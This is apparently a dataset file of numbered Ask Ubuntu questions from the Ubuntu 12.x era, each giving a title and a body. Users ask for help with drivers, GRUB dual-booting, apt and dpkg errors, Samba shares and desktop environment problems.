219409	how do i get the fingerprint reader to work on a lenovo x230 tablet ?	i followed this post : how to enable finger printer with thinkpad x230 and tried to install software support for my fingerprint reader . but the software does not find it . this is the message when i want to setup the fingerprint reader : '' thinkpad-x230-tablet : ~ $ fprintd-enroll list_devices failed : no devices available '' do you know ho to fix this issue ? and here is the result from lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 003 device 003 : id 0bdb:1911 ericsson business mobile networks bv bus 001 device 003 : id 147e:2020 upek bus 001 device 004 : id 0a5c:21e6 broadcom corp . bus 002 device 003 : id 056a:0090 wacom co. , ltd tpc90 i hope you can help me . thanks a lot .
219411	unable to resize windows	one of my ubuntu machines , a netbook running gnome classic on ubuntu 12.04 ( 32bit ) , has a problem : i can not resize windows . i can unmaximize them and remaximize them , and the resize icons do appear when i place the mouse pointer on the edges , but i can not grab and resize those edges . i have googled around and found people with problems like borders being too thin and hard to grab -- this is not the case here . it is also not application specific -- i can not resize any windows . what should i look at and fix ? i am a developer and can get around a terminal without destroying things fine . i just do n't know where to start . any ideas ?
219412	no wireless option available in 12.10	on my friend 's ubuntu 12.10 ( unity ) laptop , there is no longer an option to connect to a wireless network . it used to work . he does n't know what caused it to go away , but does anyone know how to get it back ? more info : see the screenshots below no wlan things show up when you run iwconfig laptop is hp probook 6550b
219414	installing missing package that provides xm/xm.h	i 'm compiling a software package that requires a header file . the header file is missing from my ubuntu 11.10 ( 64-bit ) installation . during the compilation using make , gcc and gfortran , i receive the following error message . xmstr.c:7:19 : fatal error : xm/xm.h : no such file or directory googling for an answer leads me to believe that a mesa library needs to be installed on my system , but i ca n't find an exact match for the package name . what might be the name of the package that i need to install ? does the package have the same name on more recent ubuntu distros ?
219415	neither keyboard nor mouse after boot , after recovery mode they work	i have installed xubuntu 12.10 on a macbook pro 5,3 . the problem is that after a normal boot the lightdm shows up but i can not use the keyboard nor touchpad . however if i choose recovery mode : 'ubuntu , with linux 3.5.0-19-generic ( recovery mode ) ' and chose resume i have keyboard and touchpad when lightdm shows up . how can i have a this working for a normal boot sequence ?
219416	is ubuntu unity compatible with kde ( ubuntu 12.04 ) ?	^^ because i want to try kde and am using unity launcher for lots of apps and do n't want to make loads of short-cuts .
219417	how can access another folder on another machine using file manager	how can i access another folder on another machine ? in windows explorer , i can enter \\10.152.34.13\projects\myfiles and i see all the folders under that directory . but how can i the same under ubuntu file manager ?
219418	inconsistent purple screen after boot	ubuntu 12.10 - hp pavilion g4 - amd radeon hd 6480g discrete-class graphics after upgrading to ubuntu 12.10 , i have encountered a random `` purple screen after boot '' issue . here is the nature of the problem : i turn my laptop on , select ubuntu in the grub menu ( i have a dual boot with windows 7 ) , then it begins to load with no problem . i see the typical purple screen while the os boots , and then i hear the logon screen sound , but my screen remains purple . i have tried just about every key combination i can think of to get it to display the logon screen , but to no avail . folding the lid down , and then back up again does not work either . because this problem is not consistent , i usually just keep restarting the computer by holding down the power button , and then pushing it to start again . eventually i will get the logon screen and then be able to work with ubuntu no problem . not sure why this issue is inconsistent . i have tried `` nomodeset '' in the grub configuration , but that does n't work either . i also noticed that the screen sometimes looks glitched when i boot or try to even use certain applications . i have also tried installing the proprietary graphics driver , which actually created an even bigger problem : i lost all menus and the screen was totally messed up and had to use the terminal to go back to the open-source driver . the proprietary driver was said to be current for 12.10 .
219426	migrating from 12.10 ( gnome default ) to kubuntu 12.10	i have installed default 12.10 desktop - gnome from cd . everything working fine . have installed some software - mostly python 3.2.3 and some related commercial tools - using software center and synaptic and spent time configuring etc . i would like to try moving to kubuntu - new to ubuntu now , but several years ago i was using redhat and i preferred kde to gnome . what will happen if i install kubuntu on top of my default 12.10 install - will it give me the option of maintaining the current installation and just use kde instead of gnome ? will my application settings remain intact , or will this be a complete 'do-over ' . what 's the best path to take here ?
219432	unresponsive firefox	my firefox is unresponsive : it keeps coming up with a message that says firefox is already running , but is not responding , to open a new window , you must first close the existing firefox process , or restart your system now restarting the system does n't work , does anyone know what else i can do ?
219435	computer wo n't boot	i tried installing ubuntu 12.10 over my windows 7 os and a couple of errors appeared , i can not remember what they said but , i tried rebooting and now when my computer starts it first shows the first image when you first boot it but then all that appears is a blinking dash in the upper left hand corner of the screen and i have tried pressing every button and nothing happens . the only thing i can do is con+alt+delete and have the system restart only to have the same thing happen . i was trying to install from usb . should i try burning the os to a disk or what can i do to fix this ? ?
219436	unix or vi fixing list	this is in a file called numbers.txt in the current working directory . starting from a unix prompt , give the sequence of unix/vi commands , that will `` fix '' the list of numbers in as few keystrokes as possible . one nine eight seven six delete this line two three four five
219441	problems with my external hard drive	hi i am new to ubuntu and tried to use my external hard drive , it works fine to access my files in the different dirs but in one of the dirs where i have all my mp3 files it finds no files at all , in windows it finds the mp3 files . what could cause this ?
219444	can not authenticate in ubuntu one behind a proxy	after installing it at home without any problem , i 'm trying to install ubuntu one at work ( ubuntu 12.04 , must use proxy ) . apparently it can not connect to the server : i ca n't sign in of course , ca n't use the `` forgotten password '' form either ( address not recognized ) , and if i open the dialog to create an account i get a message `` there was a problem downloading the captcha , reloading ... '' . i tried installing ubuntuone-client-proxy : ubuntu one behind a proxy , how to make it work ? and resinstalling the certificates : https : //one.ubuntu.com/help/faq/why-am-i-getting-an-the-authentication-failed-error-on-windows-225/ ... without any success . what am i doing wrong ?
219447	ubuntu 12.10 unity & gnome shell problems	i 'm experiencing some problems since i decided to upgrade ubuntu to 12.10 version two days ago . firstly , i can not select the unity environment i previously used on 12.04 without opening the terminal with ctrl+alt+t and typing setsid unity . when i select the unity environment on the account page when i start the computer , it automatically switch back to gnome and launch my session . i tried to set back unity using the setsid unity tip , and it worked fine . but after few minutes , everything freeze and i can not control anything anymore . the only option left is to press the power button of my asus eeepc and switch everything off . question 1 : what can i do to get my unity environment back on 12.10 from the start , without using the terminal every time ? what should i do to prevent the all system to freeze once done ? secondly , and since i can not use unity for new , i 'm using an other interface , gnome shell . what 's bothering me is that the activities bar ( let 's call it like that , 'cause i do n't know the proper name ) and the internet bar ( or any bar from any other window ) can not merge into one another , reducing the display of the screen i 'm actually using to peanuts ! question 2 : is there a way to merge those two bars ? or is there a way to hide the activities bar when i 'm not using it like on unity environment ?
219452	remmina alternative	does anybody know any good alternative for remmina ( does n't have to be free ) ? rdp would be the most important protocol for me . remmina is extremely buggy lately . segfaults every now and then , clipboard share sometimes works , sometimes it does not and if i open a rdp session too fast , the whole application just freezes . edit : because of an unrelated reason , i reinstalled fresh ubuntu 12.10 , but my remmina problems are still there . i noticed that remmina supports clipboard-exchange for pictures , gut rdesktop did n't . that was also a reason for a crash . i also tested 2x , but i could n't even find a shortkey for switching between local and remote session .
219456	light problem with ubuntu 12.10	i 've created ubuntu 12.10 bootable usb key with lili , after booting from it when i selected install some command lines appear and than screen lights off , but i realised that laptop was not off.. so i install ubuntu ( i was using torch to read information on screen , expecting everithing would be ok ) but after finishing installation and reboot nothing has changed . ubuntu is loading but screen lights is off . only some shades appear . screen lights during boot but off as ubuntu is loaded ...
219459	no sound through hdmi connection	i installed ubuntu 12.10 on a new acer rl70 which previously had limpus linux . problem is i have no sound through hdmi connection to monitor but i have sound to headphones , whereas before all was fine . what can i do to remedy this ?
219464	how do i install packages not found in the software centre ?	i need to know how to download and install programs from the internet that the software centre does n't have everything . is it a long and arduous process with many commands or does it just download and install ?
219465	can not install ia32-lib package	i have several programs that reuquire 32 bit packages ( pointing to the ia32-lib package ) . however , when i try to install it , this happens . spirit @ ubuntu : ~ $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable e : unable to correct problems , you have held broken packages . no big whoop , packages die all the time . i tried a month later however and i still got this error , trying to install the specific package produces this error . spirit @ ubuntu : ~ $ sudo apt-get install ia32-libs-multiarch reading package lists ... done building dependency tree reading state information ... done package ia32-libs-multiarch is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ia32-libs-multiarch ' has no installation candidate i am no linux whizz-kid , but this seems to be that the package does n't exist . i searched for skype in the software centre ( i was told this installs the 32-bit packages ) and it does not appear in the software centre , and the downloadable from their website produces an error about - funnily enough - no 32-bit packages . anyone who helps me will get a medal from the gods with the weight of a thousand planets . just do n't wear it for god 's sake .
219467	ca n't complete my download	i just tried downloading ubuntu to my inspirion mini 10 and was unable to run anything once the system was downloaded . can someone help me ? i 'm interested in using ubuntu because i keep running into message errors and update problems with windows .
219469	ubuntu 12.04.1 lts hangs at boot after trying to install sopcast	i tried to install sop cast last night ( in order to watch a football/soccer game ) which i thought required me to download & place the following files in my user/lib folder : libstdc++.s0.5 libstdc++.so.5.0.1 however after doing so & restarting my pc now hangs at that beautiful purple boot screen w/ ubuntu & the 5 loading dots . anyhow , i when i press escape it says the following have failed : *starting model connection manager [ fail ] *starting smb/cifc file server [ fail ] *starting lightdm display manager [ fail ] *starting cpu interrupts balancing daemon [ fail ] *starting the winbind daemon winbind *stopping gnome displat ma [ ok ] ( blank line and at the end another fail ) [ fail ] *starting cups printing spooler/server [ fail ] now i assume that the print spooler is not the problem & the issue lies in the other half dozen [ fail ] s. i also think that a few processes failed but they scroll by too quick for me to see & i can not figure out a method of scrolling up without it scrolling back down in half a second . i 've tried ctrl-alt-f2 & attempting to login but for some reason it says my password is incorrect , which it is not . i 'm not familiar with recovery mode & do not want to make a bade situation worse so i have not attempted to mess with it too much . also , for the record , i 've tried booting into previous versions of linux and the same problem occurs . this laptop is dual installed with windows 7 & i 've used a program to view my ubuntu partition from there but that does no help because it 's only a one way street being read-only .
219473	ubuntu 11.04 and health of ssd	i have to install ubuntu 11.04 on server with 4 x 160 gb ssd raids maintained as raid . i need to stick to v11.04 because it 's required software we use . i want to make sure , that i can safely install this version on ubuntu on ssd disks . i heard , that some time ago linux had some problems with block writing ( ? ) , what caused faster ssd ageing .
219475	change the bootload so it is linke bootcamp	hi i have installed bootcamp in the past and love the way it boots quickly and automatically to macos and only if you hit a button during the boot it presents you with an option to load windows . can ubuntu do this ? if yes how . if not i think it should . regards paul
219479	is it safe to remove extra grub2 entries from updated kernel versions ?	after installing an os/kernel update through ubuntu 's built-in update manager ( or software updater ) , a new boot menu entry is added ( one with the latest kernel ) and the previous boot menu entry is kept in grub . i 'm just wondering if these two boot menu entry are pointing at the same os . i want to keep storage redundancy as minimal as possible . to add to this , running `` update-grub '' shows that the two entries point to the same partition . that said , how do i safely remove the older boot menu entry ? i know i can do it through grub customizer , but i want to make sure it wo n't break anything and that it 's not just an illusion .
219482	recover deleted non-system partition	until today i had windows xp in c : partition in dual-boot with linux mint . however today i tried to install lubuntu , and while the installation was successful , i have access to all 3 os on the grub menu , i lost my d : partition where i have some important files . it wo n't show on file explorers of windows and linux . however , it is recognized in gparted or windows disk manager , as being totally used , but it still had some gb 's of free space . both in mint and lubuntu i used the default options for partitioning , as far as i can tell , i think both of them took free space from the d : partition to make their ext4 partition . i 'm afraid that if i try to recover the d : partition with testdisk utility , i might lose the grub menu and not boot at all . how should i proceed to recover d : partition ?
219491	why no menu bar in libreoffice	when you move your cursor to the top of the screen in libreoffice you do n't get a menu . you do for other applications like firefox and thunderbird but not for libreoffice .
219494	where are the keyrings folder located in ubuntu 12.10 ?	i want to delete the keychain completely ( which has only this one password key anyway ) . i found a way to reset keychain / keyring in the forums : delete the keychains folder ! i do have `` show hidden files '' activated but my `` .gnome2 '' folder only contains 1 folder called `` nautilus scripts '' which is empty - nothing else in .gnome2 . there is supposed to be the keychains folder in gnome2 but it is not there . i searched for keychains keyring seahorse etc but no success . how can i delete the keychain ? p.s . the keychains / seahorse window does not have any tabs , by the way , it only has the green cross for adding and the search box ! the keychain should be called `` default '' but its not there ... there are many certificates in the box however .
219495	libreofficeâhow to disable dual-page display	how do you turn off the two-panel display in libreoffice ? it 's so annoying .
219500	steam , launching team fortress 2 : libgl.so.1 : wrong elf class : elfclass64	after i got steam running with the workaround mentioned here , i 've got nearly the same problem when launching team fortress 2 . after starting it from steam the `` launcher '' pops up and after a few seconds it disappears with the following error in the terminal : /home/user/steam/steamapps/steamuser/team fortress 2/hl2_linux : error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass64 game removed : appid 440 `` team fortress 2 '' , procid 5299 saving roaming config store to 'sharedconfig.vdf' roaming config store 2 saved successfully because of the similarity with the workaround i used before , i tried to execute : export ld_library_path=/usr/lib32 : $ ld_library_path directly before launching the game , but there is no difference .
219507	encrypted home with ecryptfs - how to store the key file if i missed it on first boot ?	i installed ubuntu 12.04 with encrypted home-directory . when i first booted i was given the option to store a key file to some flash-drive ( usb ) or anything and there was a hint how to do it later . i wanted to do it later but now ca n't find where to find or how to generate the key file in any documentation . so whats the command , where 's the file ? ecryptfs-manger only offers me to generate a new pair . thanks a lot in advance
219514	where to install bootloader when installing ubuntu as secondary os ?	i 'm trying to install ubuntu as secondary os on my laptop . i have windows 8 already installed on my laptop . now , i know how to run ubuntu from usb drive , i created addition partition and formatted it to ext4 . so i 'm ready to install . now , 'device for boot loader installation : ' displays : /dev/sta ata hitachi ( 750 gb ) /dev/sta1 windows 8 ( loader ) /dev/sta2 /dev/sta5 /dev/sta6 ubuntu 12.04 ( 12.04 ) /dev/stb i tries choosing ubuntu 12.04 partition but it does n't even let me to pick which os to install and goes straight to windows 8 . which partition i must choose to be able to pick which os to boot from ? preferably , set up so windows 8 will be at first place , and ubuntu on second . any ideas ? i do n't want to mess up anything if i pick something wrong .
219516	howto install google-mock on ubuntu 12.10	i am having hard time trying to install google c++ mocking framework . i have successfully run sudo apt-get install google-mock . then i tried to compile this sample file # include `` gmock/gmock.h '' int main ( int argc , char** argv ) { : :testing : :initgooglemock ( & argc , argv ) ; return run_all_tests ( ) ; } with g++ -lgmock main.cpp and these errors have shown main.cpp : ( .text+0x1e ) : undefined reference to `testing : :initgooglemock ( int* , char** ) ' main.cpp : ( .text+0x23 ) : undefined reference to `testing : :unittest : :getinstance ( ) ' main.cpp : ( .text+0x2b ) : undefined reference to `testing : :unittest : :run ( ) ' collect2 : error : ld returned 1 exit status i guess the linker can not find the library files . does anybody know how to fix this ?
219517	openoffice - combined roman and arabic numerals page numbers	i am putting the final touches on my master 's thesis , and the format i need to use requires that all pages before the table of contents be numbered with roman numerals , and all following pages be numbered with arabic ( regular ) numbers . i can only figure out how to use one or the other , not both in the same document . thank you for your assistance .
219518	mounting nexus 7 on ubuntu 12.04 through usb ?	please help me troubleshoot . i would like to transfer files between my ubuntu 12.04 and nexus 7 ( android 4.2 ) i have first followed this link post carefully without success , rolled back all changed . the tried this other one simpler one link . nevertheless , upon : mount /mnt/nexus7 i get : listing raw device ( s ) device 0 ( vid=18d1 and pid=4e41 ) is a google inc ( for asus ) nexus 7 ( mode 1 ) . found 1 device ( s ) : google inc ( for asus ) : nexus 7 ( mode 1 ) ( 18d1:4e41 ) @ bus 1 , dev 11 attempting to connect device android device detected , assigning default bug flags listing file information on device with name : ( null ) and even doing an ls -l /mnt generates : ls : can not access nexus7 : transport endpoint is not connected total 4 d ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? nexus7 ideas why that is happening ? ? ?
219519	grub loader configuration	today i removed the win7 partition that came with my laptop and installed kubuntu 12.10 ( along with my default os ubuntu 12.04 ) . later , i discover that the grub configuration that manage my boot is the one from kubuntu , however , i 'd like to be the configuration from ubuntu 12.04 . is it possible that the grub from ubuntu overtakes the one from kubuntu ? thank you
219521	change wallpaper via ssh	i have a server running 12.04 32bit . i would like to change the wallpaper via an ssh connection . i tried the following command , but it did n't change the wallpaper . the command works if i am on the server ( physically sat down with a keyboard and monitor connected ) , but not via an ssh connection . gsettings set org.gnome.desktop.background picture-uri `` file : ///tmp/ozvsk.jpg '' any ideas ?
219522	how do i install nvidia geforce gtx 460 on a fresh 12.10 installation ?	i 've installed ubuntu on my computer for the first time , so i 'm an ubuntu-noob . can anyone please tell me how i install my gfx ? i 've tried to install it by using some guides , but i ca n't do it the right way . my launcher disappeared and my resolution dropped . can anyone post me an exact guide to my problem ?
219523	dynamic mmap ran out of room when trying to sudo apt-get anything	i was having an error in update manager that asks me to do a partial upgrade and it fails . now i ca n't sudo apt-get install anything . i tried to fix it , and now i ca n't sudo apt-get anything . every time , i get this output : reading package lists ... error ! e : dynamic mmap ran out of room . please increase the size of apt : :cache-limit . current value : 25165824 . ( man 5 apt.conf ) e : error occurred while processing libuptimed0 ( newversion1 ) e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_lucid_universe_binary-i386_packages w : unable to munmap e : the package lists or status file could not be parsed or opened . i have no idea why this is happening or how to fix it , and i fear that if i try something that probably does n't work that it will make my problem worse . ( just for reference i am currently running 10.04 ( lucid ) on my machine . )
219524	how do i re-install android on nexus 7 after having ubuntu on it ?	i had ubuntu on my nexus 7 and now i ca n't return my nexus 7 back to original . how do i reinstall android jelly bean back on nexus 7 ?
219527	login screen background	i changed the login screen background picture using ubuntu-tweak . it worked ! however , after a second reboot , the picture does not appear ... well , it shows up for a mili-seconds , and after that the usual lsb invades the display . question does anyone know what is happening ? thank you !
219534	where do i get my drivers	i have a sony laptop and i ca n't find my drivers that are going to be compatible with ubuntu no matter where i look , does anybody have somewhere to recommend for me ? thanks guys .
219535	missing icons in a gnome app in xfce	i 'm running xubuntu ( 12.10 ) . i was looking for a simple standalone contacts manager and ended up installing gnome-contacts . some of the icons appear do n't seem to be showing up properly though : is there a way of fixing this ?
219536	restore alt+f2 `` program execute '' in gnome classic ( no effects )	i dislike unity so i use 12.04 in gnome classic ( no effects ) mode . alt+f2 is not bringing up the usual `` execute binary ... '' dialog box . how can i restore that ? i have browsed around ( e.g . why alt+f2 r didnt work on gnome shell classic ) but solutions like killall gnome-panel etc do n't cut it .
219542	how to add authenticated podcast feed to rhythmbox	i 'm using ubuntu 12.10 with rhythmbox 2.97 . i have an rss podcast feed that uses http auth . adding this url to rhythmbox podcast library results in a generic 'unable to load the feed . check your network connection ' error . adding a non-authenticated feeds works as expected . how can i authenticate this feed in rhythmbox ? alternatively , what would be a good podcast app ( preferably gtk-based ) that support authenticated feeds ?
219545	dpkg : error : dpkg status database is locked by another process	i just wondered if somebody could tell me what this means : e : dpkg ble avbrutt . du må kjøre «sudo dpkg -- configure -a» manuelt for å rette problemet , reidsr @ ubuntu : ~ $ sudo dpkg -- configure -a dpkg : error : dpkg status database is locked by another process reidsr @ ubuntu : ~ $ how do i run sudo dpkg -- configure -a manually ?
219546	what to use for a working area when learning python and linux/ubuntu ?	i am learning python from learnpythonthehardway . in windows i had no issues with going through a lot of the exercises because the setup was easier , but i want to learn linux as well and ubuntu seemed to me the nicest choice . now i am having trouble with setting up . i can get access to the terminal and then /usr/lib/python.2.7 , but i do n't know if i should save the script in this directory ? if i try to make a directory inside this through mkdir i ca n't as permission is denied . i also tried to do chmod but did n't know how or if to do it . how can i correctly save my script ? i would like to be able to run the script like this : user @ user $ python sampleexcercise.py and have it work . i 'm using ubuntu 12.04 .
219547	how do i get more than 80 columns in command line mode ?	i installed ubuntu from the minimalcd because i just want to use vim and command line tools . however i would like more than 80 columns of text . i have a large monitor so i would like at least a couple hundred columns so i can split panes in vim and have several windows open . btw ubuntu is installed as a vmware player vm . i have already verified that the vm settings are for a large monitor ; it seems that my ubuntu setup is at issue .
219552	has anyone discovered a fix for the asus zenbook screen problems ?	the ubuntu help wiki for the asus zenbook says that `` waking from suspend does not work ( screen stays black , with no way to turn it back on ) and setting the brightness of the screen is not possible through the gnome-settings or xbacklight/xrandr . '' https : //help.ubuntu.com/community/asuszenbookprime has anyone figured out a solution to this ? i 'm on a ux-32a , and stuck on max brightness and ca n't wake the thing up from suspend . i really need help .
219553	when i use samba to share a cifs mounted drive all the subdirectories are missing the directory `` bits ''	i have a nas drive mounted on a server ( fstab ) : //192.168.0.181/videos /mnt/nas_01 cifs iocharset=utf8 , uid=65534 , gid=65534 , guest , rw , file_mode=0777 , dir_mode=0777 0 0 if i go into the directory and view it all looks good : top level $ ls -al : drwxr-xr-x 0 nobody nogroup 0 jun 28 2011 avatar - the last airbender drwxr-xr-x 0 nobody nogroup 0 jul 20 11:53 babylon 5 drwxr-xr-x 0 nobody nogroup 0 jun 28 2011 blue planet , the - seas of life drwxr-xr-x 0 nobody nogroup 0 jun 28 2011 boston legal if i go into a subdirectory - say `` babylon 5 '' : drwxr-xr-x 0 nobody nogroup 0 jul 20 11:53 . drwxr-xr-x 2 nobody nogroup 0 aug 8 08:04 .. drwxr-xr-x 0 nobody nogroup 0 jul 20 11:33 season 01 ( 1993 ) drwxr-xr-x 0 nobody nogroup 0 jun 28 2011 season 02 ( 1994 ) drwxr-xr-x 0 nobody nogroup 0 jul 20 11:33 season 03 ( 1995 ) drwxr-xr-x 0 nobody nogroup 0 jul 20 11:34 season 04 ( 1996 ) drwxr-xr-x 0 nobody nogroup 0 jul 20 11:35 season 05 ( 1998 ) again , all is good . now i have this drive shared via samba ( smb.conf ) : [ global ] follow symlinks = yes wide links = yes unix extensions = no ... [ video ] path = /mnt/nas_01 guest ok = yes read only = no now i can mount or access the share //server/video with no problem and see all the directories ( the show names ) and can make new directories , upload files , read files , etc , however , in the subdirectories , they all appear to just be files . $ ls -al : drwxr-xr-x 0 nobody nogroup 0 jun 28 2011 avatar - the last airbender drwxr-xr-x 0 nobody nogroup 0 jun 26 16:47 avatar - the legend of korra drwxr-xr-x 0 nobody nogroup 0 jul 20 11:53 babylon 5 all good so far - now i 'll cd into the babylon 5 directory drwxr-xr-x 0 nobody nogroup 0 jul 20 11:53 . drwxr-xr-x 2 nobody nogroup 0 nov 19 13:11 .. -rwxr-xr-x 0 nobody nogroup 0 jul 20 11:33 season 01 ( 1993 ) -rwxr-xr-x 0 nobody nogroup 0 jun 28 2011 season 02 ( 1994 ) -rwxr-xr-x 0 nobody nogroup 0 jul 20 11:33 season 03 ( 1995 ) -rwxr-xr-x 0 nobody nogroup 0 jul 20 11:34 season 04 ( 1996 ) -rwxr-xr-x 0 nobody nogroup 0 jul 20 11:35 season 05 ( 1998 ) only the . and .. directories have the d flag , so to all programs those directories just look like files . i have tried so many different things and am just completely stumped on this one . any ideas from anyone ? oh - and if i create a directory in the `` babylon 5 '' folder , it will create it and it will have d bit set on the base device , but through the samba share it will still be missing it .
219561	how can i fix my dual-boot machine that now fails to load windows ?	my start-up process : start computer loads bios loads grub- now i can essentially make two choices load ubuntu or load windows xp i choose to load ubuntu and everything is fine i choose to load windows xp and i get a blinking underscore this is a new thing since i have been dual booting for a month so far . and there was no update to either my linux or my windows . so far this problem is arbitrary . my grub configure file is still there and as far as i can tell correct i can post it here ( this is only the windows part ) : # # # begin /etc/grub.d/30_os-prober # # # menuentry `` microsoft windows xp professional ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 0e9fecdb5a92d74a drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # any pointers would be helpful . i do n't want to run the grub autocorrect right now -- it deleted my windows options in the past when i 've used it . i 'm using ubuntu 12.04 lts . edit : i also found my boot.ini it seems fine but herer it is : [ boot loader ] timeout=30 default=multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows= '' microsoft windows xp professional '' /noexecute=optin /fastdetect edit2 : i manually attempted to boot to xp and recreated the problem . so the problem is mot likely not with grub but with xp not wanting to boot up .
219563	ca n't even try ubuntu due to error : failure reading sector 0x5b500 from 'hd1 '	after years of hearing about how much better linux is than windows , i finally decided to make the leap starting with ubuntu desktop ( i 've tried to install both the x86 and x64 versions of 12.04 and 12.10 ) . the irony is that even before i can get started , it 's already vomiting . after getting the `` gnu grub version 2.00-7ubuntu11 '' menu at startup , i choose `` try ubuntu without installing '' and got the following message : error : failure reading sector 0x5b500 from 'hd1 ' . press any key to continue ... after pressing a key , i get the following message : [ 1.806271 ] kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) . six additional lines of error code appear and then it freezes on this screen . i also noticed that the caps lock key is flashing . i get the same series of errors if i choose `` install ubuntu '' from the grub menu . judging by what i 've read so far , i 'm guessing this is a problem related to newer drivers or hardware but i do n't see a solution . i 'm trying to perform the install on a new lenovo y580 laptop . here are the relevant specs : current os : windows 7 home premium ( service pack 1 ) 64-bit hardware : intel core i7-3610qm 2.3ghz nvidia geforce gtx 660m
219566	expanding apple raid 5 in terminal	i own a mac pro with an apple raid card . i set it up with three 1.5tb drives . i recently replaced one drive with a 3tb drive and now want the volume to expand to meet the new capacity . the apple manual tells me to type in to terminal $ sudo raidutil modify volume -- expand -n volume -s size . i tried several times to do this with different combinations but it wont work . below is the last time i tried . any help would be appreciated . nycretoucher-remote : ~ nisian $ sudo raidutil modify volume -- expand -n volume r1v1 -s size 700 required argument missing : ' -- size' usage : raidutil < global-options > modify volume < required-arguments > < optional-arguments > global-options : [ -- controller < controllertype > | -c < controllertype > ] [ -- terse | -t ] [ -- verbose | -v ] [ -- version | -v ] -- expand | -e required arguments : -- name < volumename > | -n < volumename > -- size < sizetoexpandvolume > | -s < sizetoexpandvolume > optional arguments : -- raidset < raidsetname > | -r < raidsetname > -- waitfortask | -w -- move | -m required arguments : -- names < volumename > | -n < volumename > -- targetraidset < targetraidsetname > | -t < targetraidsetname > -- raidset < raidsetname > | -r < raidsetname > optional arguments : -- waitfortask | -w -- rewrite | -w required arguments : -- name < volumename > | -n < volumename > optional arguments : -- priority < servicepriority > | -p < servicepriority > -- raidset < raidsetname > | -r < raidsetname > -- waitfortask | -w -- verify | -v required arguments : -- name < volumename > | -n < volumename > optional arguments : -- priority < servicepriority > | -p < servicepriority > -- raidset < raidsetname > | -r < raidsetname > -- waitfortask | -w nycretoucher-remote : ~ nisian $
219571	booting from usb and mounting a hdd is resulting in strange partitions	i just built a new htpc and to keep costs down i decided to use a usb 3.0 thumb drive as my boot drive . i had got most things running pretty smoothly and my next task was to mount a 2tb storage drive on start up , link it to my home folders and share it on the network . so i added a new line in fstab and restarted ... opened disk utility to see if it was successful and found my 2tb hdd partitioned into 5 parts including one that was 18446743 tb ( -611,910,040,576 bytes ) ! i reformated the drive and ran 'mount -a ' and it seemed to work this time but i could n't link my home folders to the equivalent folders on the hdd . did a restart and then my hdd was partitioned weirdly again . the line i added fstab : /dev/sda /media ntfs 0 0 my questions are : 1 . why is my hdd getting partitioned on restart ? 2 . could the hdd be dodgy ? disk utility says it 's healthy . 3 . is running ubuntu from a usb going to be more trouble than it 's worth ? it 's a bit slower than i had expected .
219575	how would i install drivers for n900 wnda4100 wireless adapter ?	i am currently using a n900 wnda4100 wireless adapter , and i am unable to install the drivers for it . it is using a ralink chipset http : //www.wikidevi.com/wiki/netgear_wnda4100 i found that ralink does give support to linux http : //www.ralinktech.com/en/04_support/support.php ? sn=501 however , i am still rather new to ubuntu and i was wondering if anyone could help me understand how i would install the drivers ( on the ralink website for the rt3573 usb ) .
219576	error processing software-center after upgrading precise to quantal	after upgrading precise to quantal i am totally unable to run apt-get upgrade or apt-get -f install sam @ ubuntu-vm : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : software-center : depends : ubuntu-sso-client-gtk but it is not installable recommends : xz-lzma but it is not installable e : unmet dependencies . try using -f. sam @ ubuntu-vm : ~ $ sudo apt-get -f install preparing to replace software-center 5.2.6 ( using ... /software-center_5.4.1.2_all.deb ) ... unpacking replacement software-center ... dpkg : error processing /var/cache/apt/archives/software-center_5.4.1.2_all.deb ( -- unpack ) : symbolic link '/usr/share/gnome/help/software-center/kn/software-center.xml ' size has changed from 61 to 0 ... errors were encountered while processing : /var/cache/apt/archives/software-center_5.4.1.2_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried : sudo apt-get remove -- purge software-center software-center-aptdaemon-plugins to no avail i tried : sudo apt-get clean and sudo dpkg -- configure -a sudo apt-get -f install i tried rebooting and no go . any tricks to getting my apt-get working again ?
219578	ubuntu 12.10 64bit fresh install , wireless issue !	just installed a fresh ubuntu 12.10 64bit on my laptop , run the update manager , restarted and suddenly i ca n't use my wifi anymore . ubuntu software center installed automatically the wifi additional driver as you can see in my screenshot . if i mark the option `` do not use the device '' and apply changes , restarting ubuntu my wifi is back and i can use it . if i run iwconfig my terminal is showing this now if i use ubuntu for more than 20 minutes surfing the web my wifi it keeps to be connected but i do n't receive any signal from it . any page i try to open it simply do n't open ( just waiting icon ) . if i disconnect my wifi and connect it again , same issue , it does n't work . the only way to make it work again is to restart ubuntu . and the same story it happens again after aprox . 20 , 30 minutes . wifi device details : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) thanks , dave
219587	gnome classic or gnome 2	how to change 3rd gnome classic version to 2nd with gtk2 ( or just make somehow gtk2 ) ? or how to make in gnome 2 the same task panel as unity 's in ubuntu 12.04 ? thanks .
